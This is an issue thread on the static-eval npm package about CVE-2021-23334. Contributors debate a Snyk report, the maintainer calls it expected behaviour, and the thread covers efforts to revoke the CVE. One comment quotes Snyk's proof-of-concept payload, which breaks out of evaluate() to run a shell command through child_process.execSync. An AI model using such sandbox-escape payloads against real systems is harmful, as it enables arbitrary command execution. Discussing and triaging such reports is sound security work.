High Severity Security vulnerability with package

[charlieTheBotDev]

Issue picked up and reported in Snyk: https://snyk.io/vuln/SNYK-JS-STATICEVAL-1056765

[SymbioticKilla]

@goto-bus-stop can it be fixed? Thanks!

[goto-bus-stop]

It's a false positive.

[andyedwardsibm]

Could you elaborate on that a bit? Snyk have a PoC at https://snyk.io/vuln/SNYK-JS-STATICEVAL-1056765 ...

var evaluate = require('static-eval');
var parse = require('esprima').parse;

var src="(function (x) { return `${eval(\"console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())\")}` })()"
var ast = parse(src).body[0].expression;
evaluate(ast)

... and https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23334 has been raised for it

[goto-bus-stop]

I see, I thought it was the same as this: 418sec/huntr#1883. That PR had omitted the quotes.

It looks like the snyk one is more valid, but still, essentially expected behaviour as documented in our readme. https://github.com/browserify/static-eval#security

[cgonzalezp91]

This issue is also in NVD-CVE-2021-23334.
It’s giving some hard times to other libraries, in my case, pdfmake, it’s a high vulnerability issue reported by npm and it’s being blocked by systems that handle this type of package.

Any workaround that we can use or possibly for a solution?

[goto-bus-stop]

i emailed snyk and they said they would revoke the CVE. i'm not sure how that works, so it might take a few days.

[cakenyo]

Any more info about the CVE revoke?

[SymbioticKilla]

Is already revoked. WhiteSource at least doesn't show it as CVE anymore.

[carnil]

@SymbioticKilla But I guess it was not officially asked for REJECT to the assigning CNA? According to https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23334 the assigning CNA was "Snyk", so if the issue turns out to be a non-security issue and the CVE invalid the respective CNA would need to reject the entry.

[namtx]

Do we have any update?

[Garbee]

https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1071860

Snyk has updated their own system reflecting that this was deemed not an issue. However, it has yet to get up to the CVE database to get revoked/amended. I just tweeted at Snyk to see how long that process normally takes. I doubt I'll hear anything, but... Best way to seem to get in touch with something like this.

[snoopysecurity]

Hey @Garbee, thanks for raising this issue, yep i agree, anything going into evaluate should not be trusted and is not the responsibility of the maintainer sanitise user input. This was added by Snyk by mistake, apologies for the spam. I will revoke the CVE and mark any Snyk references as False positive. (Expect this change in the next 24 hours)

[alasdairhurst]

Doesn't look like the CVE database maintainers poll updates to existing issues that are revoked unfortunately :(

I sent a report last month for the CVE database and didn't hear back. maybe someone else will be luckier.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23334
you will need to post a request here asking for a CVE update and then asking the CVE to be revoked.
https://cveform.mitre.org/